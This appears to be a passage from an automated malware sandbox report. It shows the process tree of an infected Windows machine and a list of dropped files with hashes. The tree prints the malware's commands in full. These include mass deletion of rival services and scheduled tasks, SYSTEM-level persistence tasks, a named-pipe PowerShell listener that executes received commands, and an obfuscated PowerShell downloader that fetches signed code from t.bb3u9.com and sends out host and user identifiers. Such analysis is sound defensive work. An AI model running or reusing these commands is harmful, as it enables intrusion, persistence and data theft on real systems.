C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop Xtfya5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete Xtfya5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config Xtfyxxx Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop Xtfyxxx5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete Xtfyxxx5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config 360rTys Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop 360rTys5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete 360rTys5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config IPSECS Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop IPSECS5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete IPSECS5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config MpeSvc Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop MpeSvc5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete MpeSvc5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config SRDSL Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop SRDSL5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete SRDSL5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config WifiService Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop WifiService5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete WifiService5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config ALGM Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop ALGM5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete ALGM5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config wmiApSrvs Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop wmiApSrvs5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete wmiApSrvs5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config wmiApServs Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop wmiApServs5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete wmiApServs5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config taskmgr1 Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop taskmgr15⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete taskmgr15⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config WebServers Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop WebServers5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete WebServers5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config ExpressVNService Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop ExpressVNService5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete ExpressVNService5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config WWW.DDOS.CN.COM Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop WWW.DDOS.CN.COM5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete WWW.DDOS.CN.COM5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config WinHelpSvcs Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop WinHelpSvcs5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete WinHelpSvcs5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config aspnet_staters Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop aspnet_staters5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete aspnet_staters5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config clr_optimization Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop clr_optimization5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete clr_optimization5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config AxInstSV Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop AxInstSV5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete AxInstSV5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config Zational Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop Zational5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete Zational5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config "DNS Server" Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop "DNS Server"5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete "DNS Server"5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config Serhiez Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop Serhiez5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete Serhiez5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config SuperProServer Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop SuperProServer5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete SuperProServer5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config ".Net CLR" Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop ".Net CLR"5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete ".Net CLR"5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config WissssssnHelp32 Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop WissssssnHelp325⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete WissssssnHelp325⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config WinHasdadelp32 Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop WinHasdadelp325⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete WinHasdadelp325⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config WinHasdelp32 Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop WinHasdelp325⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete WinHasdelp325⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config ClipBooks Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop ClipBooks5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete ClipBooks5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN my1 /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN Mysa /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN Mysa1 /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN Mysa2 /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN Mysa3 /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN ok /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN "Oracle Java" /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN "Oracle Java Update" /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN "Microsoft Telemetry" /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN "Spooler SubSystem Service" /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN "Oracle Products Reporter" /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN "Update service for products" /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN gm /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN ngm /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN Sorry /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN Windows_Update /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN Update_windows /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN WindowsUpdate1 /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN WindowsUpdate2 /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN WindowsUpdate3 /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN AdobeFlashPlayer /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN FlashPlayer1 /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN FlashPlayer2 /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN FlashPlayer3 /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN IIS /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN WindowsLogTasks /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN "System Log Security Check" /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN Update /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN Update1 /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN Update2 /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN Update3 /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN Update4 /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN DNS /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN SYSTEM /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN DNS2 /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN SYSTEMa /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN skycmd /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN Miscfost /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN Netframework /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN Flash /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN RavTask /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN GooglePingConfigs /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN HomeGroupProvider /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN MiscfostNsi /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN WwANsvc /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN Bluetooths /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN Ddrivers /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN DnsScan /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN WebServers /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN Credentials /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN TablteInputout /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN werclpsyport /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN HispDemorn /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN LimeRAT-Admin /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN DnsCore /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN "Update service for Windows Service" /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN DnsCore /F5⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /TN ECDnsCore /F5⤵
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe"5⤵
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
-
C:\Windows\system32\NETSTAT.EXE"C:\Windows\system32\NETSTAT.EXE" -anop TCP5⤵
- Gathers network information
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 120 /tn t.bb3u9.com /F /tr t.bb3u9.com3⤵
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn \ZNnVEs6 /F /tr "powershell -c PS_CMD"3⤵
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn \ZNnVEs63⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Windows\TEMP\gqmicxaz\gqmicxaz.cmdline"3⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Windows\TEMP\RES1C76.tmp" "c:\Windows\Temp\gqmicxaz\CSC8B4D4513E4B74A1A8EDFF9BC092F18.TMP"4⤵
-
\??\c:\windows\system32\cmd.exe/c powershell -c $pipe=new-object System.IO.Pipes.NamedPipeServerStream('\\.\pipe\HHyeuqi7');$pipe.WaitForConnection();$sr=new-object System.IO.StreamReader($pipe);$cmd=$sr.ReadToEnd();$sr.Dispose();$pipe.Dispose();I`Ex($cmd);(new-object System.IO.Pipes.NamedPipeServerStream('\\.\pipe\HHyeuqi7')).WaitForConnection()3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -c $pipe=new-object System.IO.Pipes.NamedPipeServerStream('\\.\pipe\HHyeuqi7');$pipe.WaitForConnection();$sr=new-object System.IO.StreamReader($pipe);$cmd=$sr.ReadToEnd();$sr.Dispose();$pipe.Dispose();I`Ex($cmd);(new-object System.IO.Pipes.NamedPipeServerStream('\\.\pipe\HHyeuqi7')).WaitForConnection()4⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c schtasks /create /ru SYSTEM /sc MINUTE /mo 50 /tn \Microsoft\Windows\tecmu /tr C:\Windows\TEMP\tecmu.exe /F3⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /ru SYSTEM /sc MINUTE /mo 50 /tn \Microsoft\Windows\tecmu /tr C:\Windows\TEMP\tecmu.exe /F4⤵
- Creates scheduled task(s)
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -w hidden -c function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String('2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv1j1feIY6R7rpfqOLdHa10=');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url='http://'+'t.bb3'+'u9.com';a($url+'/a.jsp?mail_20210113?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*'))2⤵
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -c function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String('2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv1j1feIY6R7rpfqOLdHa10=');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url='http://'+'t.bb3'+'u9.com';a($url+'/a.jsp?rep_20210113?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*'))2⤵
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\wbem\WmiApSrv.exeC:\Windows\system32\wbem\WmiApSrv.exe1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndexMD5
fc7a5d447f5b9ae5af90f3ea41489c3b
SHA142e2cbcb746ee8f5625eb9a10d35064331a54846
SHA25605c154fbfdbfe7c4df59737e0af23a2c31b3fd3b0f886ba0e3ce4f63c6dee997
SHA512e8bf594f268470de3296bcfd276261ee0c654422315ffe3b0acbe205b75d135ce8c2b12231a4e3822cbcb0ef395ae974dfd3740b81f12d3223d433989b2d9d0f
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msMD5
8f22fd82ede5313b18658e11e4f979c1
SHA1fdad2d303b908d9ae05daeb1b5eb866504cf7d42
SHA2566bd7ef513b480f8e4ba16d757fd3e18b68c78e0219e5311e11c495de49980e09
SHA5123fd2c3482668e59128702214f297413c97583fad20bb40d29c5def5151f2f663dbcdb9579661a986773317fe072c8ac5a26295d8019a41bad55ea9b85c0c36ff
-
C:\Windows\System32\WindowsPowerShell\v1.0\0MSJ3Ad6IVD.exeMD5
4a4cbece09f3b7090046b8aa726611df
SHA1f53aa0b940747952babecf6ec7dd5e7bfe0cf96e
SHA256f158f6290b79d36a599ede232a8472560c715a8c88924f7a2339259853067ae6
SHA5124759f5966f780929156604d4108bb6283a885f7ab1cd792f662cb12814bec40d6f75446980c8c0fedbbc895ab99ff8f2cb7948aefea552309d47dad97393bc0c
-
C:\Windows\System32\WindowsPowerShell\v1.0\0MSJ3Ad6IVD.exeMD5
4a4cbece09f3b7090046b8aa726611df
SHA1f53aa0b940747952babecf6ec7dd5e7bfe0cf96e
SHA256f158f6290b79d36a599ede232a8472560c715a8c88924f7a2339259853067ae6
SHA5124759f5966f780929156604d4108bb6283a885f7ab1cd792f662cb12814bec40d6f75446980c8c0fedbbc895ab99ff8f2cb7948aefea552309d47dad97393bc0c
-
C:\Windows\System32\WindowsPowerShell\v1.0\0MSJ3Ad6IVD.exeMD5
4a4cbece09f3b7090046b8aa726611df
SHA1f53aa0b940747952babecf6ec7dd5e7bfe0cf96e
SHA256f158f6290b79d36a599ede232a8472560c715a8c88924f7a2339259853067ae6
SHA5124759f5966f780929156604d4108bb6283a885f7ab1cd792f662cb12814bec40d6f75446980c8c0fedbbc895ab99ff8f2cb7948aefea552309d47dad97393bc0c
-
C:\Windows\System32\WindowsPowerShell\v1.0\0MSJ3Ad6IVD.exeMD5
4a4cbece09f3b7090046b8aa726611df
SHA1f53aa0b940747952babecf6ec7dd5e7bfe0cf96e
SHA256f158f6290b79d36a599ede232a8472560c715a8c88924f7a2339259853067ae6
SHA5124759f5966f780929156604d4108bb6283a885f7ab1cd792f662cb12814bec40d6f75446980c8c0fedbbc895ab99ff8f2cb7948aefea552309d47dad97393bc0c
-
C:\Windows\TEMP\1liziz1t\1liziz1t.dllMD5
e5df39d09be1de937e0efbb3a7482c3f
SHA1fc731e155cebab410d28b3c87b7b2edf8a0afb80
SHA256777342dbc067fb2b1238ffd3a4a23e587f26eae49ac8b0ee7c2f080050a60d6f
SHA512681a3da1f01b810d2686ef7a04f08db0fec71e514be1b978be988b3af70e35272c66cbf75dcdd5d8a67c13888801428ab95e213c8ac95bf466b672cea926eea7
-
C:\Windows\TEMP\4grphwgc\4grphwgc.dllMD5
2374e0af45a1383aedd491327f89aa27
SHA1dd412ca284bf7709f7389ae5e2d7848dd1b2f02e
SHA25676a62051fc634142a0c37357612cf7e02f1063935fa8fb69c756d66292840819
SHA51251fb2668ed4696a08e20b7cb674a1048ab7156407b3bc0b83180252744496beee1afa03d4a100b82e294ffd48fdb55ad15f0c59c123a8ff05bdb761d039e3fc5
-
C:\Windows\TEMP\RES158.tmpMD5
95d00fba83ff89600754f3a8c7af0eae
SHA1b0cd705a2ff837fe49ddecada053a8bec545f399
SHA256e6e380a81c747aa54f9df64b883e5cbe4ad59e0daf02876e9e9b6c176acc8619
SHA512212b6e3f310cb3e190fca4b27113dda629e00ea36b64db2f9f45d13e3840c711a5193c8a97fd548787be535c276194a486d993dbab34b4a31b8bf3b84ae9f6eb
-
C:\Windows\TEMP\RES1C76.tmpMD5
3af53713c8cf03ddf08b6383969963a3
SHA13eaf2edca6be48088dc8ef7b5f619ea63fa93556
SHA2567e8e78d8177f9754439bf0d3e91dede008222f9d9bb0405c6df1b8546d1d68fe
SHA512d22bb1c8e73a4dc7a89b11b1e09f86f2ef6186cb054f5ff2943ccdb6f17163dcc6c0384d77fac3bc9e4a285d83f827f1370a33990ab99565cad3a7a1b94bc46f
-
C:\Windows\TEMP\RES4470.tmpMD5
a2a16afe092646d7534a42e3bac32006
SHA195763bfa208d0ea46d61944603bef637d93ad952
SHA2565c31323b0a2548016f8827231a852e93afeffdb17f87d2a7234c428219168704
SHA512fe2619d58300f4f6c64242bcd93d073765147fc3c9ab35861e9c32736350999ab36ac015042d041314bdbed408d0efaa53ad9eb7bb66f1cde6665d603f393764
-
C:\Windows\TEMP\RES79B2.tmpMD5
4664d9e8c0745d2b91d540e3e79de29d
SHA15597d3685102c6865169058323e13ca7c5914384
SHA256f3f38c3b04aab3b5c4dd635e7436c659fdc316ed3b2256f372c057efeea53e0a
SHA512f5d0c1078660982884952b143d3c12d52cf74e10bf7c9eb3e4f24af2b3c7e3118c588c7adcbbdc1623593d97e1d2a903b875c2058f6dc26ace191e52bbacec34
-
C:\Windows\TEMP\RES8F06.tmpMD5
bb2436ee2a0d594e8a6777de5c311076
SHA15a8a2592815ea71f699662a44a1d6e8ec191f881
SHA2569b193054f63161eb7f690cf36995d6a2f34a4489630dfc87f9007a40b6e2090f
SHA5129a1f456f3b604fa4c8580716663173295dd6018bdbe7ecfe9c5f9c1783249ab5388dc44c3fe2957ec6705de0dea4933d77db136d4d9be75288cfa417566917d8
-
C:\Windows\TEMP\gqmicxaz\gqmicxaz.dllMD5
994b553cc465a9c1aac3be45443d5c52
SHA1609e77c6ca4dae281f54116acc1c6ea104f1a669
SHA256d4c113e552291b8d74756622f4eeda7b3a507bba8d2b34bfb8ef08be735bb916
SHA5123f702520d1d60030a3420c45d6ca74c1c20a63866f2daec1f2d5f9465a4c4b717689bea2c62c5ab89c4f9ec6961525e99745f7e8f925cad23403d7d057d53db6
-
C:\Windows\TEMP\j5c31vh0\j5c31vh0.dllMD5
6cd457c1ad6ebc077bf47645b88df50b
SHA1faed8285de385e9ecfdbdf09ba4b66b0e0724212
SHA256981f8e6fe2fddcff5d34153a6247c17d0c7db14de481f43def512025edf07ab6
SHA5121e8bf482f9b67cac265eadb69ea6f6ab8b5ec47b21265478e066e95c768c0088d806321bd4d9229f28e489d0d14e6c06714a7d5516826113352f901aa8c5ceb9
-
C:\Windows\TEMP\yadmwoyb\yadmwoyb.dllMD5
390fd0aca23d1c229689f58b297f5643
SHA1ff399627850b801502838e73bf28512d9fc37acc
SHA256d86d41826ecf2b492a77dac5fd18e06e3603b4c7f89c8f481694cd5ecdfb198d
SHA5127e7ae8176b3357e133108b632719f3e6dde5c6181e9290f7c99e63ddae63eac929f615cf4b1dbd6a0819a57b5f0e998c2b2a435bda3b4eb8796e2b8d50cdbddd
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_01748f9b-7dda-4310-a8ad-a0d6c6409f28MD5
6f0d509e28be1af95ba237d4f43adab4
SHA1c665febe79e435843553bee86a6cea731ce6c5e4
SHA256f545be30e70cd6e1b70e98239219735f6b61c25712720bb1e1738f02be900e7e
SHA5128dbadc140fd18eb16e2a282e3a0a895299b124850e7b9454a3f24e1cc1c090c5bebfbff5062e8807369e84ed7359e0854722cfd45b9a63681f9fea8c97fab797
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4575b320-65b5-40d1-9a51-5be8450eae69MD5
be4d72095faf84233ac17b94744f7084
SHA1cc78ce5b9c57573bd214a8f423ee622b00ebb1ec
SHA256b0d72c5c22e57913476ac8fc686a4593f137c6667d5094522c0a0685dabd7adc
SHA51243856e9b1032b8690ceea810c931bed3655e9190414bb220fb6afc136f31b8335e07604dffb28405d4006f266a54cff424c527d29924b1b732c9647a3252b097
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_46f982f5-c0e7-4773-a194-f3dbd533d73fMD5
02ff38ac870de39782aeee04d7b48231
SHA10390d39fa216c9b0ecdb38238304e518fb2b5095
SHA256fbd66a9baf753db31b8de23f2d51b67f8676687503653103080c45b16f1dc876
SHA51224a1ff76ee42ff7a5ea42843928c4df07b06178f7781cd840e1e086e88735d81506eb67259ff1e6ce5aaa7c5baea03886da265eb7e025ff4dc4c4b5f8cd3e341
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4b538283-ef7e-4012-b5d8-4f734729b191MD5
a725bb9fafcf91f3c6b7861a2bde6db2
SHA18bb5b83f3cc37ff1e5ea4f02acae38e72364c114
SHA25651651f27f54c7261887037aa1de4eff0a26c6807906dfc34a15cd5a0b58a8431
SHA5121c4b21dd5660bfec8347257bb3da64681b0a97c427790d9ab3484f687dac032bcff0e07876635953697b00cf83e7d37f97c44e0219627fd0533f60ed3024b97e
-
